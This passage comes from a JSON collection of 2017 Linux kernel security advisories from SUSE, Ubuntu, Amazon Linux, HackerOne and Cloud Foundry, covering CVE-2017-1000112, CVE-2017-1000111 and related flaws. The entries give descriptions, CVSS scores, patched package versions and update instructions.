(bnc#1012382).\n - udpv6: Fix the checksum computation when HW checksum does not apply\n (bnc#1012382).\n - usb: cdc_acm: Add quirk for Elatec TWN3 (bnc#1012382).\n - usb: chipidea: vbus event may exist before starting gadget (bnc#1012382).\n - usb: core: fix out-of-bounds access bug in usb_get_bos_descriptor()\n (bnc#1012382).\n - usb: core: harden cdc_parse_cdc_header (bnc#1012382).\n - usb: devio: Do not corrupt user memory (bnc#1012382).\n - usb: devio: Revert "USB: devio: Do not corrupt user memory"\n (bnc#1012382).\n - usb: dummy-hcd: fix connection failures (wrong speed) (bnc#1012382).\n - usb: dummy-hcd: Fix deadlock caused by disconnect detection\n (bnc#1012382).\n - usb: dummy-hcd: Fix erroneous synchronization change (bnc#1012382).\n - usb: dummy-hcd: fix infinite-loop resubmission bug (bnc#1012382).\n - usb: fix out-of-bounds in usb_set_configuration (bnc#1012382).\n - usb: gadget: composite: Fix use-after-free in\n usb_composite_overwrite_options (bnc#1012382).\n - usb: gadgetfs: fix copy_to_user while holding spinlock (bnc#1012382).\n - usb: gadgetfs: Fix crash caused by inadequate synchronization\n (bnc#1012382).\n - usb: gadget: inode.c: fix unbalanced spin_lock in ep0_write\n (bnc#1012382).\n - usb: gadget: mass_storage: set msg_registered after msg registered\n (bnc#1012382).\n - usb: gadget: udc: atmel: set vbus irqflags explicitly (bnc#1012382).\n - usb: g_mass_storage: Fix deadlock when driver is unbound (bnc#1012382).\n - usb: hub: Allow reset retry for USB2 devices on connect bounce\n (bnc#1012382).\n - usb: Increase quirk delay for USB devices (bnc#1012382).\n - usb: musb: Check for host-mode using is_host_active() on reset interrupt\n (bnc#1012382).\n - usb: musb: sunxi: Explicitly release USB PHY on exit (bnc#1012382).\n - usb: pci-quirks.c: Corrected timeout values used in handshake\n (bnc#1012382).\n - usb: plusb: Add support for PL-27A1 (bnc#1012382).\n - usb: quirks: add quirk for WORLDE MINI MIDI keyboard (bnc#1012382).\n - usb: renesas_usbhs: Fix DMAC sequence for receiving zero-length packet\n (bnc#1012382).\n - usb: renesas_usbhs: fix the BCLR setting condition for non-DCP pipe\n (bnc#1012382).\n - usb: renesas_usbhs: fix usbhsf_fifo_clear() for RX direction\n (bnc#1012382).\n - usb: serial: console: fix use-after-free after failed setup\n (bnc#1012382).\n - usb: serial: cp210x: add support for ELV TFD500 (bnc#1012382).\n - usb: serial: ftdi_sio: add id for Cypress WICED dev board (bnc#1012382).\n - usb: serial: metro-usb: add MS7820 device id (bnc#1012382).\n - usb: serial: mos7720: fix control-message error handling (bnc#1012382).\n - usb: serial: mos7840: fix control-message error handling (bnc#1012382).\n - usb: serial: option: add support for TP-Link LTE module (bnc#1012382).\n - usb: serial: qcserial: add Dell DW5818, DW5819 (bnc#1012382).\n - usb-storage: unusual_devs entry to fix write-access regression for\n Seagate external drives (bnc#1012382).\n - usb: uas: fix bug in handling of alternate settings (bnc#1012382).\n - uwb: ensure that endpoint is interrupt (bnc#1012382).\n - uwb: properly check kthread_run return value (bnc#1012382).\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA offsets\n (bnc#1012382).\n - video: fbdev: aty: do not leak uninitialized padding in clk to userspace\n (bnc#1012382).\n - vti: fix use after free in vti_tunnel_xmit/vti6_tnl_xmit (bnc#1012382).\n - watchdog: kempld: fix gcc-4.3 build (bnc#1012382).\n - x86/alternatives: Fix alt_max_short macro to really be a max()\n (bnc#1012382).\n - x86/fpu: Do not let userspace set bogus xcomp_bv (bnc#1012382).\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in core dumps\n (bnc#1012382).\n - x86/ldt: Fix off by one in get_segment_base() (bsc#1061872).\n - xfs/dmapi: fix incorrect file->f_path.dentry->d_inode usage\n (bsc#1055896).\n - xfs: handle error if xfs_btree_get_bufs fails (bsc#1059863).\n - xfs: remove kmem_zalloc_greedy (bnc#1012382).\n - xhci: fix finding correct bus_state structure for USB 3.1 hosts\n (bnc#1012382).\n\n", "modified": "2017-12-12T15:07:51", "published": "2017-12-12T15:07:51", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00027.html", "id": "SUSE-SU-2017:3267-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:40:17", "bulletinFamily": "unix", "description": "USN-3384-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.04. \nThis update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 17.04 for Ubuntu \n16.04 LTS.\n\nAndrey Konovalov discovered a race condition in the UDP Fragmentation \nOffload (UFO) code in the Linux kernel. A local attacker could use this to \ncause a denial of service or execute arbitrary code. (CVE-2017-1000112)\n\nAndrey Konovalov discovered a race condition in AF_PACKET socket option \nhandling code in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service or possibly execute arbitrary code. \n(CVE-2017-1000111)", "modified": "2017-08-10T00:00:00", "published": "2017-08-10T00:00:00", "id": "USN-3384-2", "href": "https://ubuntu.com/security/notices/USN-3384-2", "title": "Linux kernel (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:19", "bulletinFamily": "unix", "description": "Andrey Konovalov discovered a race condition in the UDP Fragmentation \nOffload (UFO) code in the Linux kernel. A local attacker could use this to \ncause a denial of service or execute arbitrary code. (CVE-2017-1000112)\n\nAndrey Konovalov discovered a race condition in AF_PACKET socket option \nhandling code in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service or possibly execute arbitrary code. \n(CVE-2017-1000111)", "modified": "2017-08-10T00:00:00", "published": "2017-08-10T00:00:00", "id": "USN-3386-1", "href": "https://ubuntu.com/security/notices/USN-3386-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:32:58", "bulletinFamily": "unix", "description": "Andrey Konovalov discovered a race condition in the UDP Fragmentation \nOffload (UFO) code in the Linux kernel. A local attacker could use this to \ncause a denial of service or execute arbitrary code. (CVE-2017-1000112)\n\nAndrey Konovalov discovered a race condition in AF_PACKET socket option \nhandling code in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service or possibly execute arbitrary code. \n(CVE-2017-1000111)", "modified": "2017-08-10T00:00:00", "published": "2017-08-10T00:00:00", "id": "USN-3385-1", "href": "https://ubuntu.com/security/notices/USN-3385-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:22:16", "bulletinFamily": "unix", "description": "Andrey Konovalov discovered a race condition in the UDP Fragmentation Offload (UFO) code in the Linux kernel. A local attacker could use this to cause a denial of service or execute arbitrary code. (CVE-2017-1000112)\n\nAndrey Konovalov discovered a race condition in AF_PACKET socket option handling code in the Linux kernel. A local unprivileged attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2017-1000111)", "modified": "2017-08-11T00:00:00", "published": "2017-08-11T00:00:00", "id": "USN-3384-1", "href": "https://usn.ubuntu.com/3384-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:33:58", "bulletinFamily": "unix", "description": "USN-3386-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 ESM.\n\nAndrey Konovalov discovered a race condition in the UDP Fragmentation \nOffload (UFO) code in the Linux kernel. A local attacker could use this to \ncause a denial of service or execute arbitrary code. (CVE-2017-1000112)\n\nAndrey Konovalov discovered a race condition in AF_PACKET socket option \nhandling code in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service or possibly execute arbitrary code. \n(CVE-2017-1000111)", "modified": "2017-08-10T00:00:00", "published": "2017-08-10T00:00:00", "id": "USN-3386-2", "href": "https://ubuntu.com/security/notices/USN-3386-2", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:34:20", "bulletinFamily": "unix", "description": "USN-3385-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nAndrey Konovalov discovered a race condition in the UDP Fragmentation \nOffload (UFO) code in the Linux kernel. A local attacker could use this to \ncause a denial of service or execute arbitrary code. (CVE-2017-1000112)\n\nAndrey Konovalov discovered a race condition in AF_PACKET socket option \nhandling code in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service or possibly execute arbitrary code. \n(CVE-2017-1000111)", "modified": "2017-08-10T00:00:00", "published": "2017-08-10T00:00:00", "id": "USN-3385-2", "href": "https://ubuntu.com/security/notices/USN-3385-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2019-09-11T00:32:11", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "Hi!\n\n[CVE-2017-1000112](https://nvd.nist.gov/vuln/detail/CVE-2017-1000112) is a vulnerability I found in the Linux kernel caused by a UFO to non-UFO path switch for UFO packets. It can be exploited to gain kernel code execution from an unprivileged process.\n\nThis vulnerability was reported to security@kernel.org and linux-distros@ following the coordinated disclosure process and then [announced](https://www.openwall.com/lists/oss-security/2017/08/13/1) on oss-security@. The fix was [committed](https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=85f1bd9a7b5a79d5baa8bf44af19658f7bf77bfa) on Aug 10, 2017.\n\nI wrote a proof-of-concept exploit for a range of Ubuntu kernels Ubuntu kernel which gains root from an unprivileged user, which can be found [here](https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-1000112). More details about the vulnerability and exploitation can be found in the oss-security [announcement](https://www.openwall.com/lists/oss-security/2017/08/13/1).\n\nThe reason I'm reporting this now is that a [similar bug](https://hackerone.com/reports/347282) that I've reported a while ago has recently been triaged and addressed, so it seems that LPE Linux kernel bugs are within the scope of this IBB program.\n\nThanks!\n\n## Impact\n\nThis vulnerability allows a local attacker to elevate privileges to root on a machine with vulnerable Linux kernel version.", "modified": "2019-09-11T00:19:48", "published": "2019-08-29T14:08:01", "id": "H1:684573", "href": "https://hackerone.com/reports/684573", "type": "hackerone", "title": "The Internet: Linux kernel: CVE-2017-1000112: a memory corruption due to UFO to non-UFO path switch", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-06-04T17:22:16", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nstack buffer overflow in the native Bluetooth stack \nA stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges. ([CVE-2017-1000251 __](<https://access.redhat.com/security/cve/CVE-2017-1000251>))\n\ndereferencing NULL payload with nonzero length \nA flaw was found in the implementation of associative arrays where the add_key systemcall and KEYCTL_UPDATE operations allowed for a NULL payload with a nonzero length. When accessing the payload within this length parameters value, an unprivileged user could trivially cause a NULL pointer dereference (kernel oops). ([CVE-2017-15274 __](<https://access.redhat.com/security/cve/CVE-2017-15274>))\n\nxfs: unprivileged user kernel oops \nA flaw was found where the XFS filesystem code mishandles a user-settable inode flag in the Linux kernel prior to 4.14-rc1. This can cause a local denial of service via a kernel panic.([CVE-2017-14340 __](<https://access.redhat.com/security/cve/CVE-2017-14340>))\n\nInformation leak in the scsi driver \nThe sg_ioctl() function in 'drivers/scsi/sg.c' in the Linux kernel, from version 4.12-rc1 to 4.14-rc2, allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for '/dev/sg0'. ([CVE-2017-14991 __](<https://access.redhat.com/security/cve/CVE-2017-14991>))\n\nkvm: nVMX: L2 guest could access hardware(L0) CR8 register \nLinux kernel built with the KVM visualization support (CONFIG_KVM), with nested visualization (nVMX) feature enabled (nested=1), is vulnerable to a crash due to disabled external interrupts. As L2 guest could access (r/w) hardware CR8 register of the host(L0). In a nested visualization setup, L2 guest user could use this flaw to potentially crash the host(L0) resulting in DoS. ([CVE-2017-12154 __](<https://access.redhat.com/security/cve/CVE-2017-12154>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-headers-4.9.58-18.51.amzn1.i686 \n perf-4.9.58-18.51.amzn1.i686 \n perf-debuginfo-4.9.58-18.51.amzn1.i686 \n kernel-4.9.58-18.51.amzn1.i686 \n kernel-devel-4.9.58-18.51.amzn1.i686 \n kernel-tools-debuginfo-4.9.58-18.51.amzn1.i686 \n kernel-debuginfo-4.9.58-18.51.amzn1.i686 \n kernel-tools-4.9.58-18.51.amzn1.i686 \n kernel-tools-devel-4.9.58-18.51.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.58-18.51.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.58-18.51.amzn1.noarch \n \n src: \n kernel-4.9.58-18.51.amzn1.src \n \n x86_64: \n kernel-tools-debuginfo-4.9.58-18.51.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.58-18.51.amzn1.x86_64 \n kernel-devel-4.9.58-18.51.amzn1.x86_64 \n kernel-debuginfo-4.9.58-18.51.amzn1.x86_64 \n kernel-4.9.58-18.51.amzn1.x86_64 \n perf-debuginfo-4.9.58-18.51.amzn1.x86_64 \n kernel-tools-devel-4.9.58-18.51.amzn1.x86_64 \n kernel-tools-4.9.58-18.51.amzn1.x86_64 \n perf-4.9.58-18.51.amzn1.x86_64 \n kernel-headers-4.9.58-18.51.amzn1.x86_64 \n \n \n", "modified": "2017-10-26T23:04:00", "published": "2017-10-26T23:04:00", "id": "ALAS-2017-914", "href": "https://alas.aws.amazon.com/ALAS-2017-914.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:20:39", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nExploitable memory corruption due to UFO to non-UFO path switch ([CVE-2017-1000112 __](<https://access.redhat.com/security/cve/CVE-2017-1000112>))\n\nheap out-of-bounds in AF_PACKET sockets ([CVE-2017-1000111 __](<https://access.redhat.com/security/cve/CVE-2017-1000111>))\n\nThe mq_notify function in the Linux kernel does not set the sock pointer to NULL upon entry into the retry logic. During a user-space close of a Netlink socket, it allows attackers to possibly cause a situation where a value may be used after being freed (use-after-free) which may lead to memory corruption or other unspecified other impact. ([CVE-2017-11176 __](<https://access.redhat.com/security/cve/CVE-2017-11176>) )\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-tools-debuginfo-4.9.38-16.35.amzn1.i686 \n kernel-tools-4.9.38-16.35.amzn1.i686 \n kernel-debuginfo-4.9.38-16.35.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.38-16.35.amzn1.i686 \n kernel-tools-devel-4.9.38-16.35.amzn1.i686 \n kernel-devel-4.9.38-16.35.amzn1.i686 \n kernel-4.9.38-16.35.amzn1.i686 \n perf-debuginfo-4.9.38-16.35.amzn1.i686 \n perf-4.9.38-16.35.amzn1.i686 \n kernel-headers-4.9.38-16.35.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.38-16.35.amzn1.noarch \n \n src: \n kernel-4.9.38-16.35.amzn1.src \n \n x86_64: \n perf-debuginfo-4.9.38-16.35.amzn1.x86_64 \n kernel-tools-4.9.38-16.35.amzn1.x86_64 \n perf-4.9.38-16.35.amzn1.x86_64 \n kernel-devel-4.9.38-16.35.amzn1.x86_64 \n kernel-tools-devel-4.9.38-16.35.amzn1.x86_64 \n kernel-headers-4.9.38-16.35.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.38-16.35.amzn1.x86_64 \n kernel-debuginfo-4.9.38-16.35.amzn1.x86_64 \n kernel-4.9.38-16.35.amzn1.x86_64 \n kernel-tools-debuginfo-4.9.38-16.35.amzn1.x86_64 \n \n \n", "modified": "2017-10-26T23:11:00", "published": "2017-10-26T23:11:00", "id": "ALAS-2017-868", "href": "https://alas.aws.amazon.com/ALAS-2017-868.html", "title": "Critical: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:45", "bulletinFamily": "software", "description": "# \n\n# Severity\n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3385-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nAndrey Konovalov discovered a race condition in the UDP Fragmentation Offload (UFO) code in the Linux kernel. A local attacker could use this to cause a denial of service or execute arbitrary code. ([CVE-2017-1000112](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000112>))\n\nAndrey Konovalov discovered a race condition in AF_PACKET socket option handling code in the Linux kernel. A local unprivileged attacker could use this to cause a denial of service or possibly execute arbitrary code. ([CVE-2017-1000111](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000111>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3312.x versions prior to 3312.33\n * 3363.x versions prior to 3363.3\n * 3421.x versions prior to 3421.19\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3312.x versions prior to 3312.33\n * Upgrade 3363.x versions prior to 3363.3\n * Upgrade 3421.x versions prior to 3421.19\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3385-2](<http://www.ubuntu.com/usn/usn-3385-2/>)\n * [CVE-2017-1000112](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000112>)\n * [CVE-2017-1000111](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000111>)\n", "modified": "2017-08-17T00:00:00", "published": "2017-08-17T00:00:00", "id": "CFOUNDRY:55CD35F3011A699D7E30AD5252951E34", "href": "https://www.cloudfoundry.org/blog/usn-3385-2/", "title": "USN-3385-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
